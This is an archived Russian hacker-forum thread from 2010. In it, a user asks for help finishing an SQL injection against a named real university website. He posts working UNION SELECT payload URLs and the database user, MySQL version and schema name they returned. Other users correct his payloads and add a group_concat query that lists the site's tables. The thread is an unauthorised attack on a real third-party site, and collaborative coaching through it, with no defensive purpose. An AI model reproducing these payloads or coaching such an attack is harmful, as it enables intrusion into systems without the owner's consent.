Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Помогите закончить иньекцию умоляю!

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Помогите закончить иньекцию умоляю!
Имя
Сообщение << Старые топики   Новые топики >>
Помогите закончить иньекцию умоляю! - 2010-09-13 04:34:05.360000   
xenon1987

Сообщений: 3
Оценки: 0
Присоединился: 2007-11-03 11:10:00.260000
Вот что то ломал сайт универа нихера не получается!
http://ufdvgu.ru/events/news/show/?id=1+union+select+null,null,VERSION(),null,null/*

Вот нашел еоличество столбцов и тот где выводиться информация!
Post #: 1
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 06:08:34.400000   
yMa.hacKer

Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
http://forum.xakep.ru/m_1507291/tm.htm - урок номер два.
Post #: 2
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 08:37:40.180000   
xenon1987

Сообщений: 3
Оценки: 0
Присоединился: 2007-11-03 11:10:00.260000
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,3,4,5


НУ вот я нашел что тройка выводиться достал следующие данные

ufdvgu_user@localhost
5.0.44-log
ufdvgu

А вот это сделать не получается подскажите пожалуйста
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,schema_name+FROM+information_schema.schemata+LIMIT+0,1,4,5

Пишит якобы

Ошибка при выполнении запроса к базе данных!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4,5' at line 1


http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,table_name,4,5+FROM+information_schema.tables

и вот это показывает

CHARACTER_SETS
Post #: 3
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 10:31:50.306666   
yMa.hacKer

Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
quote:

А вот это сделать не получается подскажите пожалуйста
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,schema_name+FROM+information_schema.schemata+LIMIT+0,1,4,5

хоть я и сам не очень в них разбираюсь, но думаю, что должно быть так:
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,schema_name,4,5+FROM+information_schema.schemata+LIMIT+0,1  
Post #: 4
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 16:39:42.253333   
toshibaaa

Сообщений: 6
Оценки: 0
Присоединился: 2010-06-07 14:52:01.196666
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4,5+from+information_schema.tables+where+table_schema=0x756664766775--
Post #: 5
RE: Помогите закончить иньекцию умоляю! - 2010-09-14 01:59:50.990000   
xenon1987

Сообщений: 3
Оценки: 0
Присоединился: 2007-11-03 11:10:00.260000
А что дальше делать подскажите пожалуйста ничего не выходит я тупица может быть?
Post #: 6
RE: Помогите закончить иньекцию умоляю! - 2010-09-15 21:50:21.006666   
redmin123

Сообщений: 61
Оценки: 0
Присоединился: 2010-08-26 12:40:27.260000
На этом сайте интересного ничего НЕТ! Если ты не умеешь крутить скули то юзай SQL Helper;
 
Post #: 7
RE: Помогите закончить иньекцию умоляю! - 2010-12-29 21:33:57.270000   
scav

Сообщений: 5
Оценки: 0
Присоединился: 2010-12-29 21:25:57.723333
честно - там ничего нет интересного. Даже админка, как таковая, там отсутствует. По крайней мере таблиц с юзерами я не нашел, хотя, судя по тому,что нет формы логина - это не удивительно.
Post #: 8
Страниц:  [1]
Все форумы >> [Уязвимости] >> Помогите закончить иньекцию умоляю!







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.